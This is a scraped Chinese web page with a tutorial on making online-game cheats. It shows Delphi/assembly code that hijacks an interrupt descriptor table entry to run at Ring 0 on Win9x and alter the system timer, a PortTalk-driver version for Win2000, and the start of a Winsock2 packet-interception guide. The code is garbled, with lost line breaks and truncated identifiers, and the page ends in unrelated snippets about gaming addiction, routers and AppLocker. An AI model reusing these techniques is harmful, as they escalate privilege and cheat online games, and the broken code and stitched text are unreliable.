首先我们建立一个过程,这个过程就是本程序的核心部份:procedure SetRing(value:word);const ZDH = $03; // 设一个中断号varIDT : array [0..5] // 保存IDT表OG : //存放旧向量beginasmpush ebxsidt IDT //读入中断描述符表mov ebx, dword ptr [IDT+2] //IDT表基地址add ebx, 8*ZDH //计算中断在中断描述符表中的位置cli //关中断mov dx, word ptr [ebx+6]shl edx, 16dmov dx, word ptr [ebx]mov [OG], edxmov eax, offset @@Ring0 //指向Ring0级代码段mov word ptr [ebx], ax //低16位,保存在1,2位shr eax, 16dmov word ptr [ebx+6], ax //高16位,保存在6,7位int ZDH //中断mov ebx, dword ptr [IDT+2] //重新定位add ebx, 8*ZDHmov edx, [OG]mov word ptr [ebx], dxshr edx, 16dmov word ptr [ebx+6], dx //恢复被改了的向量pop ebxjmp @@exitasm //到exitasm处@@Ring0: //Ring0,这个也是最最最核心的东东mov al,$34 //写入8253控制寄存器out $43,almov ax,value //写入定时值out $40,al //写定时值低位mov al,ahout $40,al //写定时值高位iretd //返回@@exitasm: 最核心的东西已经写完了,大部份读者是知其然不知其所以然吧,呵呵,不过不知其所以然也然。下面我们就试着用一下这个过程来做一个类似于变速齿轮的一个东东吧! 先加一个窗口,在窗口上放上一个trackbar控件把其Max设为20,Min设为1,把Position设为10,在这个控件的Change事件里写上: SetRing(strtoint('$'+inttostr(1742+(10-trackbar1.Position)*160))); 因为windows默认的值为$1742,所以我们把1742做为基数,又因为值越小越快,反之越慢的原理,所以写了这样一个公式,好了,这就是变速齿轮的一个Delphi+ASM版了(只适用于win9X),呵呵,试一下吧,这对你帮助会很大的,呵呵。 在win2000里,我们不可能实现在直接对端口进行操作,Ring0也失了效,有的人就会想到,我们可以写驱动程序来完成呀,但在这里我告诉你,windows2000的驱动不是一个VxD就能实现的,像我这样的低手是写不出windows所用的驱动WDM的,没办法,我只有借助外力实现了,ProtTalk就是一个很好的设备驱动,他很方便的来实现对低层端口的操作,从而实现加速外挂。 1、我们首先要下一个PortTalk驱动,他的官方网站是http://www.beyondlogic.org 2、我们要把里面的prottalk.sys拷贝出来。 3、建立一个Protalk.sys的接口(我想省略了,大家可以上/liuyue/porttalk.pas下个pas文件自己看吧) 4、实现加速外挂。 本来就篇就是补充篇原理我也不想讲太多了,下面就讲一下这程序的实现方法吧,如果说用ProtTalk来操作端口就容易多了,比win98下用ring权限操作方便。 1、新建一个工程,把刚刚下的接口文件和Protalk.sys一起拷到工程文件保存的文件夹下。 2、我们在我们新建的工程加入我们的接口文件 uses windows,ProtTalk 3、我们建立一个过程procedure SetRing(value:word);beginif not OpenPortToutportb($43,$34);outportb($40,lo(Value));outprotb($40,hi(value));ClosePortT 4、先加一个窗口,在窗口上放上一个trackbar控件把其Max设为20,Min设为1,把Position设为10,在这个控件的Change事件里写上: SetRing(strtoint('$'+inttostr(1742+(10-trackbar1.Position)*160))); ============================================================================ 网络游戏的封包技术是大多数编程爱好者都比较关注的关注的问题之一,在这一篇里就让我们一起研究一下这一个问题吧。 别看这是封包这一问题,但是涉及的技术范围很广范,实现的方式也很多(比如说APIHOOK,VXD,Winsock2都可以实现),在这里我们不可能每种技术和方法都涉及,所以我在这里以Winsock2技术作详细讲解,就算作抛砖引玉。 由于大多数读者对封包类编程不是很了解,我在这里就简单介绍一下相关知识: APIHooK: 由于Windows的把内核提供的功能都封装到API里面,所以大家要实现功能就必须通过API,换句话说就是我们要想捕获数据封包,就必须先要得知道并且捕获这个API,从API里面得到封包信息。 VXD: 直接通过控制VXD驱动程序来实现封包信息的捕获,不过VXD只能用于win9X。 winsock2: winsock是Windows网络编程接口,winsock工作在应用层,它提供与底层传输协议无关的高层数据传输编程接口,winsock2是winsock2.0提供的服务提供者接口,但只能在win2000下用。 好了,我们开始进入winsock2封包式编程吧。 在封包编程里面我准备分两个步骤对大家进行讲解:1、封包的捕获,2、封包的发送。 首先我们要实现的是封包的捕获: Delphi的封装的winsock是1.0版的,很自然winsock2就用不成。如果要使用winsock2我们要对winsock2在Delphi里面做一个接口,才可以使用winsock2。 1、如何做winsock2的接口? 1)我们要先定义winsock2.0所用得到的类型,在这里我们以WSA_DATA类型做示范,大家可以举一仿三的来实现winsock2其他类型的封装。 我们要知道WSA_DATA类型会被用于WSAStartup(wVersionRequired: var WSData: TWSAData): I,大家会发现WSData是引用参数,在传入参数时传的是变量的地址,所以我们对WSA_DATA做以下封装:constWSADESCRIPTION_LEN = 256;WSASYS_STATUS_LEN = 128;typePWSA_DATA = ^TWSA_DATA;WSA_DATA = recordwVersion: WwHighVersion: WszDescription: array[0..WSADESCRIPTION_LEN] of CszSystemStatus: array[0..WSASYS_STATUS_LEN] of CiMaxSockets: WiMaxUdpDg: WlpVendorInfo: PCTWSA_DATA = WSA_DATA; 2)我们要从WS2_32.DLL引入winsock2的函数,在此我们也是以WSAStartup为例做函数引入:& 搜索“图老师”或者“tulaoshi_com”加关注,每天最新的美食、健康、育儿、美妆、、手工DIY等生活小技巧,30天变身小巧妇!【微信扫描下图可直接关注】
来源:/n/9176.html
儿子今年读高一,沉迷于网络游戏。起初,儿子只是放学后或周末泡网吧,现在则公开逃跑去上网……谁能救救我们家沉迷网络的孩子啊? 网络,是科学发展的奇葩。说网络改变了人类的生活方式也不算过分。 但是在给人们的学习、工作、生活带来极大便利的同时,网络的出现也给家庭教育带来了新的烦恼和挑战,并且导致了一种“时代病”的...
暑期长假干什么?不出去旅游的,玩玩 “网络游戏”过把瘾也是很舒心的。但一些刚刚使用无线方式上网的朋友发现,很多喜爱的网络游戏这时无法玩了。以前拨号上网是很正常的,改用“无线路由器+无线网卡”上网方式后却不听使唤了,为什么会这样呢?其实问题就出在你的无线路由器上。 网络游戏欺负内网用户? 很多网络游戏需要开放...
什么网络游戏可以赚钱 实际上现在没有什么游戏非常能赚钱,只要游戏火就能赚钱,赚钱的方式有多种,要么先人一步最大化获取游戏资源,要么就技术厉害做代练。无论是moba游戏还是rpg还是其他类型游戏,想要在游戏中赚钱,无非就是技术+资源一起,卖技术或是卖资源取决于自己所有的优势。在近年来又开出了一个主播行业,这可以说为游戏圈...
& 一:在桌面右下角点击开始—运行,然后在运行中输入gpedit.msc,最后点击确定。 & & 二:在打开的策略组中依次展开计算机配置—Windows设置—安全设置—应用程序控制策略—AppLocker。 & & 三:右键点击AppLocker选...
网络游戏《剑灵》所需要的电脑配置 转眼 剑灵 已经进入了二次封测,而该 游戏 的配置也相继被各家网站贴了出来,令人感到惊讶的是,这款看上去画面精细到极致的游戏,从配置单上来看,居然不完全算一个硬件 杀手 。这让玩家感到十分的欣慰。话说回来,从这一点也不难看出这几年NCSOFT对游戏的优化也有了显著的提升,那么来看看配置单吧。 ...
